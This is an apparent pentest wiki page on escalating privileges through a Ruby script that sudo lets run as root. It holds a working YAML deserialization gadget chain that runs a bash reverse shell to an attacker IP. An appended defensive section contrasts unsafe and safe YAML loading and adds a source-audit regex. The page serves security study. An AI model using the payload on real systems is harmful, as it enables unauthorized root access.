# Ruby

## Theory

Ruby scripting is a powerful tool used by system administrators and developers to automate tasks and streamline processes on Unix-like systems. However, like any software, Ruby scripts can be vulnerable to various security issues which, if exploited, can lead to privilege escalation and unauthorized access.

## Practice

### YAML Code Execution

{% tabs %}
{% tab title="Enumerate" %}
Assume the Ruby script can be executed as root with sudo rights. If it uses the `File.read()` method to load a YAML file and we control that file's contents, the script is vulnerable to arbitrary code execution. Note that `File.read()` itself only returns a string: the code execution happens when the script hands that string to `YAML.load()`, which instantiates the Ruby objects named by `!ruby/object` tags in the document.

```bash
sudo -l
    (root): /usr/bin/ruby sample.rb
```

Check whether we have control over the input of the vulnerable function:

```ruby
File.read('sample.yml')
```

{% endtab %}

{% tab title="Exploit" %}
If we control some variables passed to these vulnerable functions, we can inject arbitrary code. Here is an example of a malicious `sample.yml` file read by `File.read()` and deserialized by the script:

```yaml
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "bash -c 'bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1'"
         method_id: :resolve
```

{% endtab %}
{% endtabs %}
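As an added defensive example (not part of the original page or of the referenced exploit notes), the following Ruby puts the vulnerable `YAML.load(File.read(...))` pattern next to its hardened `YAML.safe_load` form, and adds a small source-audit helper for the enumeration step that flags deserialization calls in a script sudo lets run as root. It goes slightly beyond the page by also covering anchors/aliases (the `&1` the gadget chain relies on) and `Marshal.load`. `AppConfig`, the three YAML documents and `SAMPLE_SCRIPT` are constructed for the demonstration; the Psych calls (`unsafe_load`, `safe_load` with `permitted_classes:`/`aliases:`) are the real library API.

```ruby
require 'yaml'

# Hypothetical application class, defined here only for the demonstration.
class AppConfig
  attr_accessor :listen_port
end

# Constructed sample documents (not taken from the page).
PLAIN_CONFIG = <<~YAML
  ---
  listen_port: 8080
  log_level: info
YAML

# Same data, but tagged so that an unsafe load builds a Ruby object instead of
# a Hash. The gadget chain on this page uses exactly this mechanism with
# Gem::* and Net::* classes.
TAGGED_CONFIG = <<~YAML
  --- !ruby/object:AppConfig
  listen_port: 8080
YAML

# Uses an anchor/alias pair, which the gadget chain also relies on (&1).
ALIASED_CONFIG = <<~YAML
  ---
  defaults: &base
    log_level: info
  service: *base
YAML

# Vulnerable pattern: full object deserialization of text the caller does not
# control. Psych >= 4 (Ruby 3.1+) names this YAML.unsafe_load; on older Psych
# the same behaviour is plain YAML.load, which is what sample.rb above does.
def load_unsafely(text)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(text) : YAML.load(text)
end

# Hardened pattern: only scalars, Arrays and Hashes are permitted. Any
# !ruby/object or !ruby/module tag raises Psych::DisallowedClass, and an
# alias raises Psych::BadAlias instead of being resolved.
def load_safely(text)
  YAML.safe_load(text, permitted_classes: [], permitted_symbols: [], aliases: false)
end

# Returns :rejected when the loader refuses the document, otherwise the class
# of the object it produced, so the two loaders can be compared directly.
def outcome(loader, text)
  send(loader, text).class
rescue Psych::Exception
  :rejected
end

# Heuristic source audit for the "Enumerate" step: flag deserialization calls
# in a script that sudo allows as root. Matches are candidates for review, not
# proof of a bug (on Psych >= 4, YAML.load is already the safe loader).
UNSAFE_LOAD_CALL = /\b(?:YAML|Psych)\.(?:unsafe_)?load(?:_file)?\b|\bMarshal\.load\b/

def unsafe_load_calls(source)
  source.each_line.with_index(1)
        .select { |line, _| line.match?(UNSAFE_LOAD_CALL) }
        .map { |line, number| [number, line.strip] }
end

# Constructed script text standing in for the page's sample.rb.
SAMPLE_SCRIPT = <<~RUBY
  require 'yaml'
  config = YAML.load(File.read('sample.yml'))
  safe   = YAML.safe_load(File.read('sample.yml'))
  puts config.inspect
RUBY

if __FILE__ == $PROGRAM_NAME
  puts "plain   unsafe=#{outcome(:load_unsafely, PLAIN_CONFIG)} safe=#{outcome(:load_safely, PLAIN_CONFIG)}"
  puts "tagged  unsafe=#{outcome(:load_unsafely, TAGGED_CONFIG)} safe=#{outcome(:load_safely, TAGGED_CONFIG)}"
  puts "aliased unsafe=#{outcome(:load_unsafely, ALIASED_CONFIG)} safe=#{outcome(:load_safely, ALIASED_CONFIG)}"
  unsafe_load_calls(SAMPLE_SCRIPT).each { |n, l| puts "sample.rb:#{n}: #{l}" }
end
```

If a script genuinely needs to deserialize its own classes, the fix is an explicit allow-list (`YAML.safe_load(text, permitted_classes: [AppConfig])`) rather than falling back to `YAML.unsafe_load`; everything not listed, including the `Gem::` and `Net::` classes used by the payload above, is still rejected. For a sudo-runnable script, the audit output is the thing to check first: a `YAML.load` or `Marshal.load` whose input comes from a path the invoking user can write to is the condition the Exploit tab depends on.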

## References

{% embed url="https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ruby-privilege-escalation/" %}
